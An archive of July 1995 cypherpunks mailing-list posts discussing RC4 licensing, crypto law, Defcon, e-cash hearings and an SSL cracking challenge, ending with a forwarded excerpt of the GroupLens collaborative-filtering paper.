John, did anything ever come of this?  Do you have any info at all?

					---  mkj



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phiberflea@aol.com
Date: Wed, 26 Jul 95 10:46:17 PDT
To: cypherpunks@toad.com
Subject: Re:  Questions about Conferences
Message-ID: <950726134606_123430063@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Joel Hames wrote:
What is Defcon?

Perry Metzger responded:
>Some hacker convention.  It doesn't have anything to do with crypto per se.

Here are just two of the topics which will be discussed:

Bruce Schneier,  Author of "Applied Cryptography".  TOPIC:  Will speak on
issues surrounding cryptography, digital authentication, digital cash.

EFF.  TOPIC:  Will cover current legal threats, privacy and computer
information networks.

I believe last year's key speaker was Mr. Phil Zimmermann.  There are currently
22 speakers registered for this year's convention.

:)  See ya in Vegas.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Wed, 26 Jul 95 11:02:22 PDT
To: E.J.Koops@kub.nl
Subject: Re: Crypto Law Survey
In-Reply-To: <2769@umlaw.demon.co.uk>
Message-ID: <Pine.SOL.3.91.950726134802.10241A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



This list might usefully be supplemented by an electronic censorship 
law review as the two issues are inextricably intertwined.  There is a news 
piece in the 20th July issue of NATURE saying that in the UK, the Lord 
Chancellor, Lord Mackay of Clashfern will be floating draft legislation 
to protect ISP's from defamation actions brought about by posts from 
their users.  Mackay's Defamation Bill does not address USENET and 
moderated discussion groups apparently.  Do our UK-centric readers have 
any more details on the proposals?

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rross@sci.dixie.edu (Russell Ross)
Date: Wed, 26 Jul 95 13:03:13 PDT
To: ssl-talk@netscape.com
Subject: Re: RC4
Message-ID: <v01520d05ac3c5174f88c@[144.38.16.209]>
MIME-Version: 1.0
Content-Type: text/plain


>From: Alex Tang <altitude@umich.edu>
>> I talked with RSA yesterday specifically about free servers and RC4.
>> They just said that they would need a business plan for the
>> server product.  When i said that the product would be free, they started
>> talking in circles about how everyone who uses RC4 needed a license (but i
>> was asking about the licenses...)  I asked flat out "how much would a
>> license for RC4 cost for a free server product".  They only responded with
>> "Very Expensive", and then went on about a business plan.
>
>Ask them about the free version of RC4 which is circulating.  If they say
>it is patented ask them for the patent number.  Ask them why you should
>pay them big bucks if you can get it for free.

Here's their reply to a similar correspondence:

>The RC4 algorithm is copyrighted by and intellectual property of RSA Data
>Security.  For use of this algorithm in a product or service you plan to
>sell, you may use the RC4 software implementation from our BSAFE toolkit.
>Licenses are not available for other commercial software implementations of
>this algorithm other than what is included in our BSAFE toolkit.

I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
copyright.  Intellectual property means secret, right?  Aren't there any
precedent cases involving proprietary schemes that are reverse engineered?
I know there have been, I just can't remember what they are.  In any case,
RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and
even if they lose there are considerable legal fees involved for whoever
tries it.  What if a bunch of people put secure HTTPd servers online at the
same time, without any clear trail pointing to the first one?  If the RC4
code really is legal to use, this would make it hard for RSADSI to pinpoint
anyone to sue, thus eliminating the intimidation factor.

By the way, since RSA is such a vocal opponent of the Clipper chip on the
grounds of its secret Skipjack algorithm, why does it market secret
algorithms like RC4 and RC2?  Does this seem like a double face to anyone
else?

-----------------------------------------------------------
Russell Ross                     email: rross@sci.dixie.edu
1260 N 1280 W                    voice: (801)628-8146
St. George, UT 84770-4953






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Weisberger <jweis@primenet.com>
Date: Wed, 26 Jul 95 14:11:57 PDT
To: rross@sci.dixie.edu (Russell Ross)
Subject: Re: RC4
In-Reply-To: <v01520d05ac3c5174f88c@[144.38.16.209]>
Message-ID: <199507262111.OAA14809@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text


> >The RC4 algorithm is copyrighted by and intellectual property of RSA Data
> >Security.  For use of this algorithm in a product or service you plan to
> >sell, you may use the RC4 software implementation from our BSAFE toolkit.
> >Licenses are not available for other commercial software implementations of
> >this algorithm other than what is included in our BSAFE toolkit.
> 
> I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
> copyright.  Intellectual property means secret, right?  Aren't there any
> precedent cases involving proprietary schemes that are reverse engineered?
> I know there have been, I just can't remember what they are.  In any case,
> RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and
> even if they lose there are considerable legal fees involved for whoever
> tries it.  What if a bunch of people put secure HTTPd servers online at the
> same time, without any clear trail pointing to the first one?  If the RC4
> code really is legal to use, this would make it hard for RSADSI to pinpoint
> anyone to sue, thus eliminating the intimidation factor.

RSA wants money (this comes from speaking with an RSA sales guy - Dave 
Garifolio, who incidentally sends out really neat RSA folders full of 
info you can take out of the folder and put elsewhere leaving you a cool 
folder) for the toolkit, that's all.  They send you to some sister corp of 
theirs and then charge you for the license.  Dave tells me there might be 
a chance you could buy one kit from RSA, design the server and anyone who 
wanted to use it could pay something like a $300.00 fee to lic. the thing.

However, in the aforementioned folder, Dave sent me all kinds of "we want 
big cash" paperwork, which I have yet to read (as anything you've gotta 
put in a really cool folder to get me to read can't be worth the time out 
from sleeping.)


> 
> By the way, since RSA is such a vocal opponent of the Clipper chip on the
> grounds of its secret Skipjack algorithm, why does it market secret
> algorithms like RC4 and RC2?  Does this seem like a double face to anyone
> else?
> 

Uh, yeah.

Jason Weisberger
jweis@primenet.com 
http://198.147.97.19/~jweis



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 26 Jul 95 11:31:48 PDT
To: cypherpunks@toad.com
Subject: Re: AP: Load Cash, Cruise Virtual Mall
Message-ID: <v02120d00ac3c39693750@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Or so we thought until my emailer urped:

>>electronic From: listproc@mcfeeley.cc.utexas.edu
>>Date: Sat, 20 May 1995 07:09:01 -0500
>>Reply-To: listproc@mcfeeley.cc.utexas.edu
>>Sender: listproc@mcfeeley.cc.utexas.edu
>>To: rah@shipwright.com
>>Cc: grgcombs@mail.utexas.edu
>>Subject: SUBSCRIBE MCIP ROBERT HETTINGA
>>X-Comment: Unix List Processor, version 6.0c/940712/0
>>
>>You have been added to list mcip@mcfeeley.cc.utexas.edu.
>>The system has recorded your address as
>>
>>                        rah@shipwright.com
>>
>>and in order for your messages to get posted (if the list accepts postings),
>>you will have to send them from this address, unless the list does not require
>>subscription for posting.

Well, you get the point.

My apologies. Maybe I should do my mail in Netscape instead...

;-)

Now I suppose it's time to change my mcip password, eh?

Feh.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 26 Jul 95 11:35:13 PDT
To: cypherpunks@toad.com
Subject: AP: Load Cash, Cruise Virtual Mall
Message-ID: <v02120d01ac3c3af19368@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



Ahem. One more time...

>WASHINGTON (AP)  A day in the financial life of a future consumer may
>begin something like this: Wake up, log in, download some e-cash into
>your PC's hard drive, then go cruise the virtual mall.
>
>It's on the verge of happening, experts told Congress on Tuesday. But
>some caution that, without planning and coordination, the brave new
>Internet world of a cashless, checkless society could turn into an
>electronic "Tower of Babel."
>
>"On the Internet ... it is difficult to tell if a transaction has taken
>place since there is no central authority to track and report it," said
>David M. Van Lear, chief executive of Electronic Payment Services Inc.,
>a 2 1/2-year-old joint venture of four banks.
>
>"There are currently no standard operating regulations," he said. "In
>addition, there is no central authority to track and report on criminal
>activity, including counterfeiting and money laundering."
>
>It was all a bit mind-boggling for members of the House Banking monetary
> policy subcommittee, whose chairman, Rep. Michael Castle, R-Del.,
>observed, "Some of us can barely read our e-mail."
>
>But, more than 25,000 merchants in 150 countries are already on the
>Internet, selling or advertising products and services to 20 million
>users, a figure that will grow to 100 million within five years,
>according to MasterCard International.
>
>So, Castle said, "it is time for lawmakers to start grappling with the
>implications of an entirely new monetary system in cyberspace, one that
> transcends national governments and national boundaries."
>
>For instance, how will the Federal Reserve Board measure the amount and
>velocity of money flowing through the Internet? How will the Internal
>Revenue Service audit transactions conducted anonymously without paper
>records? What laws apply when a U.S. consumer orders a product from a
>business overseas and the goods never arrive?
>
>The lawmakers received seemingly conflicting advice from a panel of
>experts that included Van Lear, executives from MasterCard and Visa
>U.S.A. and Scott Cook, the chairman of the personal finance software
>company, Intuit Inc.
>
>They were told that government will be crucial to fostering stability of
> the new electronic monetary system and public trust in it but that
>premature or too much regulation could stifle innovation.
>
>The new technology, the experts said, will both open new avenues for
>fraud and offer new protections and safeguards.
>
>The system, some said, needs to be fully auditable so tax and criminal
>authorities can reconstruct a series of transactions but it also should
>protect Americans' privacy.
>
>For instance, David Chaum, the pony-tailed chairman of DigiCash Inc.,
>said his version of electronic cash, or e-cash, would provide the same
>privacy protection and anonymity in small transactions as traditional
>cash.
>
>Using encrypted codes and special software that offer much more security
>than the current unprotected transfer of credit card information via
>the Internet, consumers could download cash into the hard drive of their
>personal computers.
>
>They'd spend it by transferring it to merchants via computer. Or they
>could store the cash on "smart cards" equipped with a computer chip
>capable of storing far more information than the magnetic strips now on
>credit and debit cards.
>
>The cards then would function like pocket money and could be used in
>vending machines, parking meters and subway turnstiles equipped to
>receive them.
>
>MasterCard International and Visa are developing similar smart cards
>but, unlike Chaum's, theirs would generate an audit trail that could
>help law enforcement officials combatting tax evasion, counterfeiting
>and money laundering.
>
>Rosalind L. Fisher, executive vice president of Visa, a consortium of
>financial institutions, urged Congress to maintain public confidence in
>new forms of electronic payment by allowing them to be offered only
>through institutions to supervision by banking regulators.
>
>At the same time, she said, we are concerned that additional regulation
>in this area will "stifle innovations ... subjecting many of these
>products to ... premature death."
>
>By way of example, she cited a Federal Reserve regulation that, if
>applied, could require machines accepting smart cards to issue paper
>receipts, ruining the economic viability of the cards for such small
>purchases as a 75-cent soda.
>
>Castle, who plans at least one more hearing on the future of money this
>fall, agreed that Congress should hold off on legislating for now but
>should be prepared to move quickly if problems develop.
>
>"I don't think we need regulations now, but we had better be ready to
>respond ... if some guy can crack a code and create a million-dollar
>account, transfer it around a couple times and end up in the Bahamas,"
>he said.
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael@umlaw.demon.co.uk (Michael Froomkin)
Date: Wed, 26 Jul 95 09:30:56 PDT
To: E.J.Koops@kub.nl
Subject: Re: Crypto Law Survey
Message-ID: <2769@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for your useful survey.  May I make two comments about 
the US section?  First, many lawyers believe the ITAR to be 
unconstitutional as applied to some or all cryptographic 
algorithms and software; a court test is likely within the next 
few years.   Second, the American Bar Association Section on 
Science and Technology's Information Security Committee is 
drafting Guidelines and Model Legislation which, if they are 
ever completed, will improve upon the Utah initiative.  
Meanwhile, other states, including California, are considering 
bills that are similar to Utah's.
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 26 Jul 95 12:51:18 PDT
To: rross@sci.dixie.edu (Russell Ross)
Subject: Re: RC4
In-Reply-To: <v01520d01ac3c496012a1@[144.38.16.209]>
Message-ID: <9507261950.AA28199@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Russell Ross writes:
> In any case,
> RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and
> even if they lose there are considerable legal fees involved for whoever
> tries it.

I'll just have to put it into my IPSP implementation, then. I am more
than willing to pay a few tens of thousands to lawyers for this
particular purpose. I will produce a text description of the algorithm
and have an intern re-implement it from scratch just to make sure --
I'll probably prepare some notarized documents attesting to the
development methodology, too.  It will be fun to see if Jim Bidzos
actually tries to pull something under those circumstances.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 26 Jul 95 12:52:52 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Challenge-response passwords (Was: big word listing)
In-Reply-To: <199507261944.MAA20832@ix9.ix.netcom.com>
Message-ID: <9507261952.AA28574@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart writes:
> It's _not_ free after 1997!  I thought of it last fall, was
> surprised I couldn't find it anywhere in the literature, given that
> it's pretty obvious, but eventually found that a guy from Siemens
> had patented it in Germany and then gotten a US patent in ~1994.
> Unfortunately, he phrased it in terms of
> "commutative hash functions", with g^X mod p as an example, so it's more
> general.

Given all the prior art, I have a solid suspicion that the patent
wouldn't hold up. The existence of the publicly published Diffie
Hellman patent, for instance, makes it rather hard to patent the
more general case.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Wed, 26 Jul 95 15:53:19 PDT
To: strick at Jihad <strick@yak.net>
Subject: Hey, you're back?
Message-ID: <199507262250.PAA00754@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi, Strick, I see you're back on the list - how was Europe?
Are you back out west, or just dialing in from somewhere?
                Bill
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Wed, 26 Jul 95 13:12:51 PDT
To: Russell Ross <rross@sci.dixie.edu>
Subject: Re: RC4
In-Reply-To: <v01520d01ac3c496012a1@[144.38.16.209]>
Message-ID: <Pine.SUN.3.91.950726160640.3857A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Jul 1995, Russell Ross wrote:

> I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
> copyright.  Intellectual property means secret, right?  Aren't there any
> precedent cases involving proprietary schemes that are reverse engineered?
> I know there have been, I just can't remember what they are. 

There was one a few years back with a special chip in Nintendo cartridges 
that you needed to buy from them... it was against a company called Atari 
(no, not THAT Atari (I think)), and was decided in Atari's favor.

Hope that helps...
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@umich.edu>
Date: Wed, 26 Jul 95 13:35:11 PDT
To: rross@sci.dixie.edu (Russell Ross)
Subject: Re: RC4
In-Reply-To: <v01520d05ac3c5174f88c@[144.38.16.209]>
Message-ID: <199507262034.QAA18609@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed Jul 26 16:09:38 1995: you scribbled...
> 
> >Ask them about the free version of RC4 which is circulating.  If they say
> >it is patented ask them for the patent number.  Ask them why you should
> >pay them big bucks if you can get it for free.
> 
> Here's their reply to a similar correspondence:
> 
> >The RC4 algorithm is copyrighted by and intellectual property of RSA Data
> >Security.  For use of this algorithm in a product or service you plan to
> >sell, you may use the RC4 software implementation from our BSAFE toolkit.
> >Licenses are not available for other commercial software implementations of
> >this algorithm other than what is included in our BSAFE toolkit.
> 
> I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
> copyright.  Intellectual property means secret, right?  Aren't there any
> precedent cases involving proprietary schemes that are reverse engineered?
> I know there have been, I just can't remember what they are.  In any case,
> RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and
> even if they lose there are considerable legal fees involved for whoever
> tries it.  What if a bunch of people put secure HTTPd servers online at the
> same time, without any clear trail pointing to the first one?  If the RC4
> code really is legal to use, this would make it hard for RSADSI to pinpoint
> anyone to sue, thus eliminating the intimidation factor.

So, does anyone know for certain if this is the true letter of the law?
Since RC4 has been reverse engineered (or leaked) to the public, do they
have any claim on it if there is no patent?  Seeing the legal web that
surrounds a lot of the current crypto situation in the US, it's not
surprising that RSA would try to smoke screen everyone into thinking that
there would be a clear violation (prosecutable by law) if anyone used RC4
without getting a license.  (It's also not surprising that no one's tried
as well...)

...alex... 

     Alex Tang  altitude@cic.net   http://petrified.cic.net/~altitude
   CICNet: Unix Support / InfoSystems Services / WebMaster / Programmer
       Viz-It!: Software Developer (Check out http://vizit.cic.net)
  UM-ITD: TaX.500 Developer (Check out http://petrified.cic.net/tax500)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 26 Jul 95 13:51:45 PDT
To: jlasser@rwd.goucher.edu (Jon Lasser)
Subject: Re: RC4
In-Reply-To: <Pine.SUN.3.91.950726160640.3857A-100000@rwd.goucher.edu>
Message-ID: <m0sbDPf-0009tGC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Wed, 26 Jul 1995, Russell Ross wrote:
> 
> > I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
> > copyright.  Intellectual property means secret, right?  Aren't there any
> > precedent cases involving proprietary schemes that are reverse engineered?
> > I know there have been, I just can't remember what they are. 
> 
> There was one a few years back with a special chip in Nintendo cartridges 
> that you needed to buy from them... it was against a company called Atari 
> (no, not THAT Atari (I think)), and was decided in Atari's favor.

There has only been one company called "Atari".  They did split between home
computers and video games/PC game software when Jack Tramiel left Commodore
and bought Atari.

I thought that it wasn't decided in Atari's favor, but maybe I didn't hear
the final word.  I believe that they used a form of rom access that they
had patented and restricted producers by only licensing roms to those
they wanted.

If I remember, it had something to do with address auto-increment.

I always wondered how the 'Game Genie' people got enough information
to do what they did.  (A true 'wedge' cartridge that you could program
codes into for all games to give extra lives, hard to find abilities,
change parameters, etc.)

> Hope that helps...
> Jon
> ------------------------------------------------------------------------------
> Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
>           Visit my home page at http://www.goucher.edu/~jlasser/
>   You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Wed, 26 Jul 95 14:08:52 PDT
To: cypherpunks@toad.com
Subject: SSL challenge?
Message-ID: <9507262108.AA25550@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Where does the effort to bruteforce SSL stand?

I've got a bunch of P5/90s ready and waiting.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 26 Jul 95 17:40:35 PDT
To: cypherpunks@toad.com
Subject: "grouplens": reputation system, groupware, etc.
Message-ID: <199507270038.RAA04789@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello cpunks, this strikes me as a very visionary proposal
for changing the underlying news infrastructure approach.
It refers to the idea of "ratings servers" (it would be
interesting to trace the origination of the term). I think the 
ideas are very malleable and may become a powerful force for 
future cyberspace communities. We are just now witnessing the
birth of reputation systems in cyberspace. I think they
will eventually become one of its most important features.

For any cpunks with interests in investing your time in 
world-changing technologies, this would be at the top of
*my* list. There are very difficult logistical problems
to overcome, but this "second generation of communication"
will IMHO be a key requirement of developing actual communities
in cyberspace.


~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html



X-within-URL: http://www-sloan.mit.edu/ccs/CCSWP165.html


    GROUPLENS: AN OPEN ARCHITECTURE FOR COLLABORATIVE FILTERING OF NETNEWS
                                       
   
   
   Paul Resnick*, Neophytos Iacovou**, Mitesh Suchak*, Peter Bergstrom**,
   John Riedl**
   
   
   * MIT Center for Coordination Science
   Room E53-325
   50 Memorial Drive
   Cambridge, MA 02139
   617-253-8694
   Email: presnick@mit.edu
   
   ** University of Minnesota
   Department of Computer Science
   Minneapolis, Minnesota 55455
   (612) 624-7372
   Email: riedl@cs.umn.edu
   
   From Proceedings of ACM 1994 Conference on Computer Supported
   Cooperative Work, Chapel Hill, NC: Pages 175-186
   
   Copyright (c)1994, Association for Computing Machinery
     _________________________________________________________________
   
   ABSTRACT
   
   Collaborative filters help people make choices based on the opinions
   of other people. GroupLens is a system for collaborative filtering of
   netnews, to help people find articles they will like in the huge
   stream of available articles. News reader clients display predicted
   scores and make it easy for users to rate articles after they read
   them. Rating servers, called Better Bit Bureaus, gather and
   disseminate the ratings. The rating servers predict scores based on
   the heuristic that people who agreed in the past will probably agree
   again. Users can protect their privacy by entering ratings under
   pseudonyms, without reducing the effectiveness of the score
   prediction. The entire architecture is open: alternative software for
   news clients and Better Bit Bureaus can be developed independently and
   can interoperate with the components we have developed.
   
   KEYWORDS: Collaborative filtering, information filtering, electronic
   bulletin boards, social filtering, Usenet, netnews, user model,
   selective dissemination of information.
   
   INTRODUCTION
   
   Computer networks allow the formation of interest groups that cross
   geographical barriers. Bulletin boards have been an important
   mechanism for that. Rather than addressing an article directly to a
   known set of people, the writer posts it in a newsgroup, a public
   place available to anyone interested in the topic. The Usenet netnews
   system creates the illusion of a single bulletin board available
   anywhere in the world. It propagates articles so that, with some
   delays, an article posted from anywhere in the world is available to
   everyone else.
   
   Permission to copy without fee all or part of this material is granted
   provided that the copies are not made or distributed for commercial
   advantage, the ACM copyright notice and the title of the publication
   and its date appear, and notice is given that copying is by permission
   of the Association for Computing Machinery. To copy otherwise, or to
   republish, requires a fee and/or specific permission.
   
   Recent counts indicate that there are more than 8000 newsgroups, with
   an average traffic of more than 100 MB per day[1]. The newsgroups
   carry announcements, questions, and discussions. In a discussion,
   often called a thread, one article induces replies from several
   others, each of which may also induce replies. The January 24, 1994
   estimates of netnews participation indicate that more than 140,000
   people posted articles in the previous two weeks. There are many more
   "lurkers" who read but do not post articles. Clearly, a lot of people
   are getting value from these bulletin boards.
   
   In fact, netnews' rapid broadcast nature and widespread readership has
   reshaped the way the computing community works. System administrators
   depend on netnews to keep in touch with the latest development work,
   the latest security holes, and the latest bug fixes. Researchers
   depend on netnews as a way of keeping up-to-date on new research
   directions and important results in between conferences. Many others
   use netnews just to keep in touch with other people around the world,
   to learn about new books, new recipes, new music, and what life in
   other cities is like. Over the years netnews has become a principal
   medium for sharing among computer users.
   
   Even so, the experience of using netnews is not completely satisfying.
   Almost everyone complains that the signal to noise ratio is too low.
   Writers cannot easily tell whether their comments are valued, except
   by the vocal few who post responses. Some seem not to care about
   reader interest, only about their own right to write. Moreover, tastes
   differ, so that no one article will appeal to all the readers of a
   newsgroup. Each reader ends up sifting through many news articles to
   find a few valuable ones. Often, readers find the process too
   frustrating and stop reading netnews altogether.
   
   Netnews provides two mechanisms that help readers limit their
   attention to articles likely to interest them. First, the division of
   the bulletin board into newsgroups allows readers to focus on a few
   topics. When the number of postings in a newsgroup gets too large, it
   is often split into two or more newsgroups with identifiable
   subtopics. Second, some newsgroups are moderated. Attempted postings
   to these newsgroups are automatically forwarded to the moderator, who
   decides whether or not they belong in the newsgroup. Usenet propagates
   only those articles that receive the moderator's stamp of approval.
   
   In addition, software packages for reading netnews (hereafter referred
   to as news clients) provide other mechanisms that ease readers'
   burdens. First, most news clients display a summary of the author and
   subject line for each message in a newsgroup. The user then indicates
   which articles she would like to read. Second, most news clients
   display all of the articles in a particular discussion thread
   together. Some initially show only the first article in each thread,
   allowing users to quickly peruse the current discussion topics. Third,
   some news clients provide "kill files." A kill file identifies text
   strings that are not interesting to a particular user. If a user puts
   the subject line of an article into the kill file, no further articles
   on that subject will be displayed. If a user puts the author's name
   into a kill file, no further articles from that author will be
   displayed. Finally, some news readers provide string search
   facilities. If the user is particularly interested in articles that
   mention "collaborative filtering," the news client can find them.
   
   GroupLens provides a new mechanism to help focus attention on
   interesting articles. It draws on a deceptively simple idea: people
   who agreed in their subjective evaluation of past articles are likely
   to agree again in the future. After reading articles, users assign
   them numeric ratings. GroupLens uses the ratings in two ways. First,
   it correlates the ratings in order to determine which users' ratings
   are most similar to each other. Second, it predicts how well users
   will like new articles, based on ratings from similar users. The heart
   of GroupLens is an open architecture that includes news clients for
   entry of ratings and display of predictions, and rating servers for
   distribution of ratings and delivery of predictions.
   
   Related Work
   
   The general problems of information overload and low signal to noise
   ratio have received considerable attention in the research literature.
   We use the term information filtering generically to refer both to
   finding desired information (filtering in) and eliminating that which
   is undesirable (filtering out), but related work also appears under
   the labels of information retrieval and selective dissemination of
   information [2]. In addition, research on agents [12, 13], user
   modeling [1, 9], knowbots [8], and mediators [21] has explored
   semi-autonomous computer programs that perform information filtering
   on behalf of a user.
   
   Malone et al. [13] describe three categories of filtering techniques,
   cognitive, social, and economic, based on the information sources the
   techniques draw on in order to predict a user's reaction to an
   article. The three categories provide a useful road map to the
   literature.
   
   Cognitive, or content-based filtering techniques select documents
   based on the text in them. For example, the kill files and string
   search features provided by news clients perform content filtering.
   Even the division of netnews into newsgroups is a primitive example,
   since a reader restricts his attention to those articles with a
   particular text string in their "newsgroup:" field.
   
   Other content-based filtering techniques could potentially be used as
   well. The profile of which texts to include or kill could be more
   complex than a collection of character strings. For example, strings
   could be combined with the Boolean operators AND, OR, and NOT.
   Alternatively, the profile could consist of weight vectors, with the
   weights expressing the relative importance of each of a set of terms
   [4, 5, 16].
   
   Some content filtering techniques update the profiles automatically
   based on feedback about whether the user likes the articles that the
   current profile selects. Information retrieval research refers to this
   process as relevance feedback [17]. The techniques for updating can
   draw on Bayesian probability [2], genetic algorithms [18], or other
   machine learning techniques.
   
   Social filtering techniques select articles based on relationships
   between people and on their subjective judgments. Placing an author's
   name in a kill file is a crude example. More sophisticated techniques
   might also filter out articles from people who previously co-authored
   papers with the objectionable person.
   
   Collaborative filtering, based on the subjective evaluations of other
   readers, is an even more promising form of social filtering. Human
   readers do not share computers' difficulties with synonymy, polysemy,
   and context when judging the relevance of text. Moreover, people can
   judge texts on other dimensions such as quality, authoritativeness, or
   respectfulness. A moderated newsgroup employs a primitive form of
   collaborative filtering, choosing articles for all potential readers
   based on evaluations by a single person, the moderator.
   
   The Tapestry system [6] makes more sophisticated use of subjective
   evaluations. Though it was not designed to work specifically with
   netnews, it allows filtering of all incoming information streams,
   including netnews. Many people can post evaluations, not just a single
   moderator, and readers can choose which evaluators to pay attention
   to. The evaluations can contain text, not just binary accept/reject
   recommendations. Moreover, filters can combine content-based criteria
   and subjective evaluations. For example, a reader could request
   articles containing the word "CSCW" that Joe has evaluated and where
   the evaluation contains the word, "excellent".
   
   Our work is similar in spirit to Tapestry but extends it in two ways.
   First, Tapestry is a monolithic system designed to share evaluations
   within a single site. We share ratings between sites and our
   architecture is open to the creation of new news clients and rating
   servers that would use the evaluations in different ways. Second,
   Tapestry does not include any aggregate queries. The rating servers we
   have implemented aggregate ratings from several evaluators, based on
   correlation of their past ratings. A reader need not know in advance
   whose evaluations to use and in fact need not even know whose
   evaluations are actually used. In GroupLens, ratings entered under a
   pseudonym are just as useful as those that are signed.
   
   Maltz has developed a system that aggregates all ratings of each
   netnews article, determining a single score for each [14]. By
   contrast, GroupLens customizes score prediction to each user, thus
   accommodating differing interests and tastes. In return for its
   reduced functionality, Maltz's scheme scales better than ours, because
   rating servers can exchange summaries of several users' ratings of an
   article, rather than individual ratings.
   
   The subjective evaluations used in collaborative filtering may be
   implicit rather than explicit. Read Wear and Edit Wear [7] guide users
   based on other users' interactions with an artifact. The GroupLens
   news clients monitor how long users spend reading each article but our
   rating servers do not yet use that information when predicting scores.
   
   
   Economic filtering techniques select articles based on the costs and
   benefits of producing and reading them. For example, Malone argues
